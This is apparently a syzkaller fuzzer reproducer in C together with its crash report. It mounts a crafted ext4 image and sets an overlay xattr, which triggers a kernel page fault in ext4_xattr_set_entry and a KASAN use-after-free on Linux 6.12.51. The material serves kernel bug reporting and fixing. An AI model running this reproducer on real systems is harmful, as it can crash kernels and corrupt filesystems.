{"/proc/sys/kernel/keys/gc_delay", "1"},
{"/proc/sys/vm/oom_kill_allocating_task", "1"},
{"/proc/sys/kernel/ctrl-alt-del", "0"},
{"/proc/sys/kernel/cad_pid", tmppid},
};
for (size_t i = 0; i < sizeof(files) / sizeof(files[0]); i++) {
if (!write_file(files[i].name, files[i].data)) {
}
}
kill(cad_pid, SIGKILL);
while (waitpid(cad_pid, NULL, 0) != cad_pid)
;
}

struct thread_t {
int created, call;
event_t ready, done;
};

static struct thread_t threads[16];
static void execute_call(int call);
static int running;

static void* thr(void* arg)
{
struct thread_t* th = (struct thread_t*)arg;
for (;;) {
event_wait(&th->ready);
event_reset(&th->ready);
execute_call(th->call);
__atomic_fetch_sub(&running, 1, __ATOMIC_RELAXED);
event_set(&th->done);
}
return 0;
}

static void execute_one(void)
{
if (write(1, "executing program\n", sizeof("executing program\n") - 1)) {
}
int i, call, thread;
for (call = 0; call < 3; call++) {
for (thread = 0; thread < (int)(sizeof(threads) / sizeof(threads[0]));
thread++) {
struct thread_t* th = &threads[thread];
if (!th->created) {
th->created = 1;
event_init(&th->ready);
event_init(&th->done);
event_set(&th->done);
thread_start(thr, th);
}
if (!event_isset(&th->done))
continue;
event_reset(&th->done);
th->call = call;
__atomic_fetch_add(&running, 1, __ATOMIC_RELAXED);
event_set(&th->ready);
event_timedwait(&th->done, 50 + (call == 0 ? 4000 : 0));
break;
}
}
for (i = 0; i < 100 && __atomic_load_n(&running, __ATOMIC_RELAXED); i++)
sleep_ms(1);
}

static void execute_one(void);

#define WAIT_FLAGS __WALL

static void loop(void)
{
int iter = 0;
for (;; iter++) {
char cwdbuf[32];
sprintf(cwdbuf, "./%d", iter);
if (mkdir(cwdbuf, 0777))
exit(1);
reset_loop();
int pid = fork();
if (pid < 0)
exit(1);
if (pid == 0) {
if (chdir(cwdbuf))
exit(1);
setup_test();
execute_one();
exit(0);
}
int status = 0;
uint64_t start = current_time_ms();
for (;;) {
sleep_ms(10);
if (waitpid(-1, &status, WNOHANG | WAIT_FLAGS) == pid)
break;
if (current_time_ms() - start < 5000)
continue;
kill_and_wait(pid, &status);
break;
}
remove_dir(cwdbuf);
}
}

void execute_call(int call)
{
switch (call) {
case 0:
// syz_mount_image$ext4 arguments: [
// fs: ptr[in, buffer] {
// buffer: {65 78 74 34 00} (length 0x5)
// }
// dir: ptr[in, buffer] {
// buffer: {2e 2f 66 69 6c 65 31 00} (length 0x8)
// }
// flags: mount_flags = 0x0 (8 bytes)
// opts: ptr[in, fs_options[ext4_options]] {
// fs_options[ext4_options] {
// elems: array[fs_opt_elem[ext4_options]] {
// fs_opt_elem[ext4_options] {
// elem: union ext4_options {
// norecovery: buffer: {6e 6f 72 65 63 6f 76 65 72 79} (length
// 0xa)
// }
// comma: const = 0x2c (1 bytes)
// }
// fs_opt_elem[ext4_options] {
// elem: union ext4_options {
// debug_want_extra_isize: fs_opt["debug_want_extra_isize",
// fmt[hex, int32]] {
// name: buffer: {64 65 62 75 67 5f 77 61 6e 74 5f 65 78 74
// 72 61 5f 69 73 69 7a 65} (length 0x16) eq: const = 0x3d (1
// bytes) val: int32 = 0x3e (18 bytes)
// }
// }
// comma: const = 0x2c (1 bytes)
// }
// }
// common: array[fs_opt_elem[fs_options_common]] {
// }
// null: const = 0x0 (1 bytes)
// }
// }
// chdir: int8 = 0x1 (1 bytes)
// size: len = 0x603 (8 bytes)
// img: ptr[in, buffer] {
// buffer: (compressed buffer with length 0x603)
// }
// ]
// returns fd_dir
NONFAILING(memcpy((void*)0x200000000600, "ext4\000", 5));
NONFAILING(memcpy((void*)0x200000000640, "./file1\000", 8));
NONFAILING(memcpy((void*)0x200000000080, "norecovery", 10));
NONFAILING(*(uint8_t*)0x20000000008a = 0x2c);
NONFAILING(memcpy((void*)0x20000000008b, "debug_want_extra_isize", 22));
NONFAILING(*(uint8_t*)0x2000000000a1 = 0x3d);
NONFAILING(sprintf((char*)0x2000000000a2, "0x%016llx", (long long)0x3e));
NONFAILING(*(uint8_t*)0x2000000000b4 = 0x2c);
NONFAILING(*(uint8_t*)0x2000000000b5 = 0);
NONFAILING(memcpy(
(void*)0x200000000d80,
"\x78\x9c\xec\xdd\xcd\x6f\x14\xe7\x19\x00\xf0\x67\x66\xb1\xc1\xc6\xad"
"\x41\xf2\xa1\xf4\x52\x57\x3d\x80\x54\x75\xfd\xd5\x0a\xe8\xa5\xa0\xb6"
"\xa7\x16\x41\x69\xd5\x5e\x2a\x51\x17\xd6\x1f\x62\xed\x75\xfd\x21\x61"
"\xf7\x62\x38\x58\xea\xad\x95\x2a\xf5\xd6\x36\x87\x1c\x72\xb3\xf2\x07"
"\x24\x1c\xf2\x07\x24\xb7\x44\x89\x94\x2b\x8a\x84\x88\x42\x0e\x91\x38"
"\x38\x9a\xfd\xb0\x8d\xbd\x1b\x3b\x60\x3c\xd8\xf3\xfb\x49\xe3\x9d\x77"
"\xde\x9d\x7d\xdf\xd9\x67\x9f\xdd\x9d\x17\xde\xd9\x00\x0a\x6b\x30\xfb"
"\x93\x46\x9c\x8b\x88\x2b\x49\x44\xff\xb6\xba\x13\xd1\xac\x1c\x6c\xdc"
"\x6f\x6d\x6c\x7d\x2a\x5b\x92\xd8\x28\xfd\xfe\x49\x12\x49\x44\x2c\x8d"
"\xad\x4f\xb5\xee\x9f\x34\x6f\x4f\x37\x77\xbb\x10\x11\x37\x7f\x1d\x71"
"\xb3\xb4\xbb\xdd\x85\xe5\x95\xbb\xe3\xd5\x6a\x65\xbe\x59\x1e\x5a\x9c"
"\x99\x1b\x5a\x58\x5e\xf9\xc9\xf4\xcc\xf8\x64\x65\xb2\x32\x3b\x76\x69"
"\xe4\xf2\xa5\xb1\x9f\x5d\xbc\x38\x72\x60\xc7\xfa\xbb\x27\x7d\xef\x3f"
"\xfa\xdf\xf5\x81\xb7\x7f\xfa\xdf\x3f\x4f\xfc\xfd\xad\x95\xac\xbf\x7d"
"\xcd\xba\xed\xc7\x71\x50\x06\x63\xb0\xf9\x9c\x74\xc5\x95\x1d\x75\x3b"
"\xcb\x47\x55\xa9\xf9\x3a\x49\xf3\xee\x08\x2f\xa4\x15\xbf\xae\x88\x18"
"\x88\xfe\x28\x35\xb3\x3e\xd3\x1f\xcf\x3e\xc9\xb5\x73\xc0\x2b\xb5\xd1"
"\x1f\xb1\xb1\x53\xf6\xa1\xb5\x6b\xe3\x73\x7a\x5a\xbb\x03\x47\x59\x22"
"\x89\xa1\xa0\x5a\xdf\x03\xb2\xf3\xdf\xd6\x92\xdf\xb7\x11\x0e\xdb\xe3"
"\xab\x8d\x13\xc0\xa5\xe6\xd8\xce\xda\x66\xfc\x4f\x34\xc6\x86\xe2\x54"
"\xbc\x77\x32\xa2\xf7\x69\xb2\xed\xcc\xb0\x31\xd6\x33\x78\x00\xed\x67"
"\x8f\x71\x65\xf0\x4f\xef\x64\x4b\xbc\xa2\x71\x18\x3a\x5b\xbd\x1f\x11"
"\xdf\x6b\x97\xff\x49\x3d\x36\x67\xe2\x54\xbd\xd4\xfb\x34\x7d\x2e\xfe"
"\x69\x44\xdc\x68\xde\x66\xdb\x6f\xbe\x60\xfb\x3b\x5f\x43\xe2\x7f\xb8"
"\x5e\x26\xfe\x7f\xd9\x16\xff\xbf\xbe\x60\xfb\xe2\x0f\x00\x00\x70\x38"
"\x1e\x5e\x8d\x88\xe1\x76\xe7\x7f\xe9\xe6\xf8\x4f\xc4\xee\xf1\x9f\xbe"
"\xc6\x6e\x2f\xcd\xf9\x5f\xbe\x5a\xe3\x7f\x6b\xbb\xc6\xff\xb6\xe2\x5f"
"\x6a\x13\xff\x24\x22\xe6\xf6\xd9\xc6\xf5\x0f\xfe\xf5\xc3\x4e\x75\xdb"
"\xc7\xff\xb2\x25\x6b\xbf\x35\x16\xc8\xab\xf7\xf8\x7e\xc4\xf7\xdb\xc6"
"\x3f\xd9\x8c\x7f\xd2\x26\xfe\x69\x44\xac\xee\xb3\x8d\x8f\xcf\xfe\x67"
"\xa0\x53\x5d\xa7\xf8\xaf\xbc\xd4\x51\xb1\x5f\x1b\x6f\x44\x9c\x8f\xf6"
"\xf1\x6f\x49\xbe\xf9\xff\x67\x0e\x4d\x4c\x57\x2b\xc3\x8d\xbf\x6d\xdb"
"\x78\xf6\xc7\x47\x6f\x76\x6a\x5f\xfe\xe7\x2b\xcb\xff\xde\x0e\xf1\xdf"
"\xeb\xfd\xff\x9f\xfb\x6c\xa3\xfa\x8f\x2f\xfa\x76\x6f\xdd\x7a\xb4\x56"
"\xec\x57\x7f\xf5\x9b\x77\x77\xc7\x3f\xfd\xac\x3b\xf9\x43\xfd\xc5\xd8"
"\xdd\xdc\x72\x6f\x7c\x71\x71\x7e\x24\xa2\x3b\xf9\xed\xee\xed\xa3\xdf"
"\xe6\xe8\x8b\xa7\xf5\x1c\xb5\x9e\xc3\x2c\xfe\x17\x7e\xf4\xac\xf9\xaf"
"\xc1\xed\x3f\xff\xdb\xbd\xff\xf7\x44\xc4\xff\xf7\xd9\xe6\x83\x4f\x7f"
"\xf9\x55\xa7\x3a\xf9\x9f\xaf\x2c\xfe\x77\xf6\xc8\xff\x76\xf1\xcf\xb6"
"\xad\xef\xb3\x8d\xcf\x1f\xfc\xad\xe3\xc7\xf9\xe0\x9e\xf9\x0f\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xc7"
"\x47\x5a\xbf\x96\x6f\x92\x96\x37\xd7\xd3\xb4\x5c\x6e\xfc\x86\xf7\x40"
"\xf4\xa6\xd5\xda\xc2\xe2\x8f\x27\x6a\x4b\xb3\x77\x1a\xd7\xfc\x3d\x13"
"\x5d\x69\xeb\x4a\x8f\xfd\x8d\x72\x92\x95\x47\xea\xeb\x5b\xe5\xd1\x1d"
"\xe5\xb1\x88\x38\x1b\x11\xff\x2e\xf5\xd4\xcb\xe5\xdb\xb5\xea\x9d\xbc"
"\x0f\x1e\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x5e\x13\xa7\x77\xcc\xff\xff\xb2\xd4\x98\xff\x0f\x14\xc4\x89\xbc\x3b"
"\x00\xe4\x46\xfe\x43\x71\xc9\x7f\x28\x2e\xf9\x0f\xc5\x25\xff\xa1\xb8"
"\xe4\x3f\x14\x97\xfc\x87\xe2\x92\xff\x50\x5c\xf2\x1f\x8a\x4b\xfe\x43"
"\x71\xc9\x7f\x00\x00\x00\x00\x38\x96\x6e\x5c\xbb\x96\x2d\x1b\x6b\x63"
"\xeb\x53\x59\x79\xb6\x36\x39\x7d\x77\x6a\xee\xf2\xe8\x70\x79\x66\xe9"
"\x76\xf9\x76\x6d\x7e\xae\x3c\x59\xab\x4d\xd6\x7f\xb1\x7f\x66\xef\xc7"
"\xab\xd6\x6a\x73\x23\xa3\xb1\x74\x6f\x68\xb1\xb2\xb0\x38\xb4\xb0\xbc"
"\x72\x6b\xa6\xb6\x34\xbb\x78\x6b\x7a\x66\x7c\xb2\x72\xab\xd2\x75\x08"
"\xc7\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x47\xcd\xd9\x1f\x3c\xfc\x28\x89\x88\xd5\x9f\xf7\xd4\x97\x4c\x77\xb3"
"\xce\x5c\x7d\x38\xde\xd2\xbc\x3b\x00\xe4\xa6\x94\x77\x07\x80\xdc\xb8"
"\xf4\x3f\x14\x97\x73\x7c\x20\xd9\xa3\xfe\x54\xa7\x8a\x87\x7b\xed\x09"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x1c\x94\xf3\xe7\xcc\xff\x87"
"\xa2\x32\xff\x1f\x8a\xcb\xfc\x7f\x28\x2e\xf3\xff\xa1\xb8\x3a\x9d\xe3"
"\x9f\x3c\xe4\x7e\x00\xf9\x31\xff\x1f\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x5e\x7f\x7d\xf5\x25\x49\xcb\xcd\xb9\xc0\x7d\x91\xa6\xe5\x72"
"\xc4\x77\x22\xe2\x4c\x74\x25\x13\xd3\xd5\xca\x70\x44\x7c\x37\x22\x3e"
"\x2c\x75\x9d\xcc\xca\x23\x79\x77\x1a\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x8e\x99\x85\xe5\x95\xbb\xe3\xd5\x6a\x65"
"\x3e\xd7\x95\x5f\x34\x7b\x93\x73\x37\xac\x58\x79\xad\x56\x4a\x11\x91"
"\x57\xeb\x39\xbf\x31\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x40\x01\x6d\x4d\xfa\xcd\xbb\x27\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x90\x9f\xad\xdf\xff\x3f\x98\x95\xee\x36"
"\x55\x79\x1f\x23\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xc0\x51\xf4\x75"
"\x00\x00\x00\xff\xff\x86\xf0\xf3\x59",
1539));
NONFAILING(syz_mount_image(/*fs=*/0x200000000600, /*dir=*/0x200000000640,
/*flags=*/0, /*opts=*/0x200000000080,
/*chdir=*/1, /*size=*/0x603,
/*img=*/0x200000000d80));
break;
case 1:
// lchown arguments: [
// file: ptr[in, buffer] {
// buffer: {2e 2f 66 69 6c 65 31 00} (length 0x8)
// }
// uid: uid (resource)
// gid: gid (resource)
// ]
NONFAILING(memcpy((void*)0x200000001600, "./file1\000", 8));
syscall(__NR_lchown, /*file=*/0x200000001600ul, /*uid=*/0, /*gid=*/0);
break;
case 2:
// lsetxattr$trusted_overlay_upper arguments: [
// path: ptr[in, buffer] {
// buffer: {2e 2f 66 69 6c 65 31 00} (length 0x8)
// }
// name: ptr[in, buffer] {
// buffer: {74 72 75 73 74 65 64 2e 6f 76 65 72 6c 61 79 2e 75 70 70 65
// 72 00} (length 0x16)
// }
// val: ptr[inout, array[ANYUNION]] {
// array[ANYUNION] {
// }
// }
// size: len = 0xe1 (8 bytes)
// flags: setxattr_flags = 0x0 (8 bytes)
// ]
NONFAILING(memcpy((void*)0x200000000700, "./file1\000", 8));
NONFAILING(memcpy((void*)0x200000000740, "trusted.overlay.upper\000", 22));
syscall(__NR_lsetxattr, /*path=*/0x200000000700ul,
/*name=*/0x200000000740ul, /*val=*/0x200000000f40ul,
/*size=*/0xe1ul, /*flags=*/0ul);
break;
}
}
int main(void)
{
syscall(__NR_mmap, /*addr=*/0x1ffffffff000ul, /*len=*/0x1000ul, /*prot=*/0ul,
/*flags=MAP_FIXED|MAP_ANONYMOUS|MAP_PRIVATE*/ 0x32ul,
/*fd=*/(intptr_t)-1, /*offset=*/0ul);
syscall(__NR_mmap, /*addr=*/0x200000000000ul, /*len=*/0x1000000ul,
/*prot=PROT_WRITE|PROT_READ|PROT_EXEC*/ 7ul,
/*flags=MAP_FIXED|MAP_ANONYMOUS|MAP_PRIVATE*/ 0x32ul,
/*fd=*/(intptr_t)-1, /*offset=*/0ul);
syscall(__NR_mmap, /*addr=*/0x200001000000ul, /*len=*/0x1000ul, /*prot=*/0ul,
/*flags=MAP_FIXED|MAP_ANONYMOUS|MAP_PRIVATE*/ 0x32ul,
/*fd=*/(intptr_t)-1, /*offset=*/0ul);
setup_sysctl();
const char* reason;
(void)reason;
install_segv_handler();
use_temporary_dir();
loop();
return 0;
}
Syzkaller hit 'BUG: unable to handle kernel paging request in ext4_xattr_set_entry' bug.

EXT4-fs (loop3): unmounting filesystem 00000000-0000-0000-0000-000000000000.
loop3: detected capacity change from 0 to 1024
EXT4-fs (loop3): mounted filesystem 00000000-0000-0000-0000-000000000000 r/w without journal. Quota mode: writeback.
BUG: unable to handle page fault for address: ff1100010f590fe4
#PF: supervisor write access in kernel mode
#PF: error_code(0x0003) - permissions violation
PGD 108c01067 P4D 108c02067 PUD 100175063 PMD 10f58d063 PTE 800000010f590121
Oops: Oops: 0003 [#1] PREEMPT SMP KASAN NOPTI
CPU: 2 UID: 0 PID: 1396 Comm: syz.3.37 Not tainted 6.12.51 #3
Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.13.0-1ubuntu1.1 04/01/2014
RIP: 0010:memcpy_orig+0x31/0x140 arch/x86/lib/memcpy_64.S:71
Code: 48 83 fa 20 0f 82 86 00 00 00 40 38 fe 7c 35 48 83 ea 20 48 83 ea 20 4c 8b 06 4c 8b 4e 08 4c 8b 56 10 4c 8b 5e 18 48 8d 76 20 <4c> 89 07 4c 89 4f 08 4c 89 57 10 4c 89 5f 18 48 8d 7f 20 73 d4 83
RSP: 0018:ff110000091cf600 EFLAGS: 00010202
RAX: ff1100010f590fe4 RBX: ff110000091cf870 RCX: ffffffffa3d1f0bb
RDX: 00000000000000a1 RSI: ff1100010907f820 RDI: ff1100010f590fe4
RBP: ff1100010f590fe4 R08: ffc6bb6b7fe35abe R09: 2224ff136a5fe2b6
R10: f5fe0ff5c6d9f6e6 R11: 25b2ffc7db754ec3 R12: ff1100010907f800
R13: ff110000091cf7e0 R14: ff1100010f5910c2 R15: 00000000ffffff22
FS: 00007fcfa1195700(0000) GS:ff1100011b100000(0000) knlGS:0000000000000000
CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033
CR2: ff1100010f590fe4 CR3: 00000001028de001 CR4: 0000000000771ef0
PKRU: 00000000
Call Trace:
<TASK>
ext4_xattr_set_entry+0x10ba/0x17e0 fs/ext4/xattr.c:1813
ext4_xattr_ibody_set+0x380/0x570 fs/ext4/xattr.c:2283
ext4_xattr_set_handle+0xa16/0x14d0 fs/ext4/xattr.c:2455
ext4_xattr_set+0x1e1/0x3a0 fs/ext4/xattr.c:2569
__vfs_setxattr+0x13e/0x1b0 fs/xattr.c:200
__vfs_setxattr_noperm+0x106/0x5f0 fs/xattr.c:234
__vfs_setxattr_locked+0x1c0/0x260 fs/xattr.c:295
vfs_setxattr+0x12e/0x330 fs/xattr.c:321
do_setxattr+0x134/0x1e0 fs/xattr.c:629
path_setxattr+0x1da/0x220 fs/xattr.c:658
__do_sys_lsetxattr fs/xattr.c:683 [inline]
__se_sys_lsetxattr fs/xattr.c:679 [inline]
__x64_sys_lsetxattr+0xc1/0x160 fs/xattr.c:679
do_syscall_x64 arch/x86/entry/common.c:52 [inline]
do_syscall_64+0xaa/0x1b0 arch/x86/entry/common.c:83
entry_SYSCALL_64_after_hwframe+0x77/0x7f
RIP: 0033:0x7fcfa13520cd
Code: 02 b8 ff ff ff ff c3 66 0f 1f 44 00 00 f3 0f 1e fa 48 89 f8 48 89 f7 48 89 d6 48 89 ca 4d 89 c2 4d 89 c8 4c 8b 4c 24 08 0f 05 <48> 3d 01 f0 ff ff 73 01 c3 48 c7 c1 b0 ff ff ff f7 d8 64 89 01 48
RSP: 002b:00007fcfa1194ba8 EFLAGS: 00000246 ORIG_RAX: 00000000000000bd
RAX: ffffffffffffffda RBX: 00007fcfa15a1fa0 RCX: 00007fcfa13520cd
RDX: 0000200000000f40 RSI: 0000200000000740 RDI: 0000200000000700
RBP: 00007fcfa13d800a R08: 0000000000000000 R09: 0000000000000000
R10: 00000000000000e1 R11: 0000000000000246 R12: 0000000000000000
R13: 00007fcfa15a1fac R14: 00007fcfa15a2038 R15: 00007fcfa1194d40
</TASK>
Modules linked in:
CR2: ff1100010f590fe4
---[ end trace 0000000000000000 ]---
RIP: 0010:memcpy_orig+0x31/0x140 arch/x86/lib/memcpy_64.S:71
Code: 48 83 fa 20 0f 82 86 00 00 00 40 38 fe 7c 35 48 83 ea 20 48 83 ea 20 4c 8b 06 4c 8b 4e 08 4c 8b 56 10 4c 8b 5e 18 48 8d 76 20 <4c> 89 07 4c 89 4f 08 4c 89 57 10 4c 89 5f 18 48 8d 7f 20 73 d4 83
RSP: 0018:ff110000091cf600 EFLAGS: 00010202
RAX: ff1100010f590fe4 RBX: ff110000091cf870 RCX: ffffffffa3d1f0bb
RDX: 00000000000000a1 RSI: ff1100010907f820 RDI: ff1100010f590fe4
RBP: ff1100010f590fe4 R08: ffc6bb6b7fe35abe R09: 2224ff136a5fe2b6
R10: f5fe0ff5c6d9f6e6 R11: 25b2ffc7db754ec3 R12: ff1100010907f800
R13: ff110000091cf7e0 R14: ff1100010f5910c2 R15: 00000000ffffff22
FS: 00007fcfa1195700(0000) GS:ff1100011b100000(0000) knlGS:0000000000000000
CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033
CR2: ff1100010f590fe4 CR3: 00000001028de001 CR4: 0000000000771ef0
PKRU: 00000000
note: syz.3.37[1396] exited with irqs disabled
EXT4-fs error (device loop3): ext4_validate_block_bitmap:440: comm syz-executor: bg 0: block 169: padding at end of block bitmap is not set
EXT4-fs error (device loop3) in ext4_mb_clear_bb:6545: Corrupt filesystem
==================================================================
BUG: KASAN: slab-use-after-free in owner_on_cpu include/linux/sched.h:2185 [inline]
BUG: KASAN: slab-use-after-free in rwsem_can_spin_on_owner kernel/locking/rwsem.c:723 [inline]
BUG: KASAN: slab-use-after-free in rwsem_down_write_slowpath+0x1064/0x1110 kernel/locking/rwsem.c:1111
Read of size 4 at addr ff1100010a11c5f4 by task syz-executor/859

CPU: 1 UID: 0 PID: 859 Comm: syz-executor Tainted: G D 6.12.51 #3
Tainted: [D]=DIE
Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.13.0-1ubuntu1.1 04/01/2014
Call Trace:
<TASK>
__dump_stack lib/dump_stack.c:94 [inline]
dump_stack_lvl+0x7d/0xa0 lib/dump_stack.c:120
print_address_description mm/kasan/report.c:377 [inline]
print_report+0xcf/0x610 mm/kasan/report.c:481
kasan_report+0xb5/0xe0 mm/kasan/report.c:594
owner_on_cpu include/linux/sched.h:2185 [inline]
rwsem_can_spin_on_owner kernel/locking/rwsem.c:723 [inline]
rwsem_down_write_slowpath+0x1064/0x1110 kernel/locking/rwsem.c:1111
__down_write_common kernel/locking/rwsem.c:1304 [inline]
__down_write kernel/locking/rwsem.c:1313 [inline]
down_write+0x116/0x130 kernel/locking/rwsem.c:1578
inode_lock include/linux/fs.h:815 [inline]
vfs_unlink+0xcf/0x900 fs/namei.c:4458
do_unlinkat+0x48c/0x660 fs/namei.c:4533
__do_sys_unlink fs/namei.c:4581 [inline]
__se_sys_unlink fs/namei.c:4579 [inline]
__x64_sys_unlink+0x40/0x50 fs/namei.c:4579
do_syscall_x64 arch/x86/entry/common.c:52 [inline]
do_syscall_64+0xaa/0x1b0 arch/x86/entry/common.c:83
entry_SYSCALL_64_after_hwframe+0x77/0x7f
RIP: 0033:0x7fcfa13516eb
Code: 73 01 c3 48 c7 c1 b0 ff ff ff f7 d8 64 89 01 48 83 c8 ff c3 66 2e 0f 1f 84 00 00 00 00 00 90 f3 0f 1e fa b8 57 00 00 00 0f 05 <48> 3d 01 f0 ff ff 73 01 c3 48 c7 c1 b0 ff ff ff f7 d8 64 89 01 48
RSP: 002b:00007ffd12234e78 EFLAGS: 00000206 ORIG_RAX: 0000000000000057
RAX: ffffffffffffffda RBX: 0000000000000000 RCX: 00007fcfa13516eb
RDX: 00007ffd12234eb0 RSI: 00007ffd12234eb0 RDI: 00007ffd12234f40
RBP: 00007ffd12234f40 R08: 0000000000000001 R09: 00007ffd12234d00
R10: 00000000fffffffb R11: 0000000000000206 R12: 00007fcfa13d7bb2
R13: 00007ffd12236050 R14: 0000555583064a80 R15: 00007ffd122370c0
</TASK>

Allocated by task 1395:
kasan_save_stack+0x24/0x50 mm/kasan/common.c:47
kasan_save_track+0x14/0x30 mm/kasan/common.c:68
unpoison_slab_object mm/kasan/common.c:319 [inline]
__kasan_slab_alloc+0x59/0x70 mm/kasan/common.c:345
kasan_slab_alloc include/linux/kasan.h:250 [inline]
slab_post_alloc_hook mm/slub.c:4129 [inline]
slab_alloc_node mm/slub.c:4178 [inline]
kmem_cache_alloc_node_noprof+0xe2/0x260 mm/slub.c:4230
alloc_task_struct_node kernel/fork.c:181 [inline]
dup_task_struct kernel/fork.c:1114 [inline]
copy_process+0x3bb/0x6670 kernel/fork.c:2228
kernel_clone+0xc6/0x7a0 kernel/fork.c:2810
__do_sys_clone+0xcf/0x120 kernel/fork.c:2953
do_syscall_x64 arch/x86/entry/common.c:52 [inline]
do_syscall_64+0xaa/0x1b0 arch/x86/entry/common.c:83
entry_SYSCALL_64_after_hwframe+0x77/0x7f

Freed by task 0:
kasan_save_stack+0x24/0x50 mm/kasan/common.c:47
kasan_save_track+0x14/0x30 mm/kasan/common.c:68
kasan_save_free_info+0x3a/0x60 mm/kasan/generic.c:579
poison_slab_object mm/kasan/common.c:247 [inline]
__kasan_slab_free+0x38/0x50 mm/kasan/common.c:264
kasan_slab_free include/linux/kasan.h:233 [inline]
slab_free_hook mm/slub.c:2374 [inline]
slab_free mm/slub.c:4632 [inline]
kmem_cache_free+0x241/0x4d0 mm/slub.c:4734
put_task_struct include/linux/sched/task.h:145 [inline]
delayed_put_task_struct+0x134/0x180 kernel/exit.c:228
rcu_do_batch kernel/rcu/tree.c:2575 [inline]
rcu_core+0x64c/0x1960 kernel/rcu/tree.c:2831
handle_softirqs+0x15f/0x520 kernel/softirq.c:579
__do_softirq kernel/softirq.c:613 [inline]
invoke_softirq kernel/softirq.c:453 [inline]
__irq_exit_rcu kernel/softirq.c:662 [inline]
irq_exit_rcu+0x7f/0xb0 kernel/softirq.c:674
instr_sysvec_apic_timer_interrupt arch/x86/kernel/apic/apic.c:1049 [inline]
sysvec_apic_timer_interrupt+0x70/0x80 arch/x86/kernel/apic/apic.c:1049
asm_sysvec_apic_timer_interrupt+0x1a/0x20 arch/x86/include/asm/idtentry.h:702

Last potentially related work creation:
kasan_save_stack+0x24/0x50 mm/kasan/common.c:47
__kasan_record_aux_stack+0x8c/0xa0 mm/kasan/generic.c:541
__call_rcu_common.constprop.0+0x73/0x8d0 kernel/rcu/tree.c:3098
put_task_struct_rcu_user+0x60/0xb0 kernel/exit.c:234
finish_task_switch+0x4b1/0x650 kernel/sched/core.c:5252
context_switch kernel/sched/core.c:5346 [inline]
__schedule+0xd69/0x2b80 kernel/sched/core.c:6723
schedule_idle+0x5c/0x90 kernel/sched/core.c:6841
do_idle+0x241/0x3a0 kernel/sched/idle.c:354
cpu_startup_entry+0x4f/0x60 kernel/sched/idle.c:424
start_secondary+0x1bc/0x210 arch/x86/kernel/smpboot.c:314
common_startup_64+0x12c/0x138

The buggy address belongs to the object at ff1100010a11c5c0
which belongs to the cache task_struct of size 5640
The buggy address is located 52 bytes inside of
freed 5640-byte region [ff1100010a11c5c0, ff1100010a11dbc8)

The buggy address belongs to the physical page:
page: refcount:1 mapcount:0 mapping:0000000000000000 index:0x0 pfn:0x10a118
head: order:3 mapcount:0 entire_mapcount:0 nr_pages_mapped:0 pincount:0
flags: 0x200000000000040(head|node=0|zone=2)
page_type: f5(slab)
raw: 0200000000000040 ff11000100184dc0 ffd4000004510200 0000000000000002
raw: 0000000000000000 0000000000050005 00000001f5000000 0000000000000000
head: 0200000000000040 ff11000100184dc0 ffd4000004510200 0000000000000002
head: 0000000000000000 0000000000050005 00000001f5000000 0000000000000000
head: 0200000000000003 ffd4000004284601 ffffffffffffffff 0000000000000000
head: 0000000000000008 0000000000000000 00000000ffffffff 0000000000000000
page dumped because: kasan: bad access detected

Memory state around the buggy address:
ff1100010a11c480: fb fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc
ff1100010a11c500: fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc
>ff1100010a11c580: fc fc fc fc fc fc fc fc fa fb fb fb fb fb fb fb
^
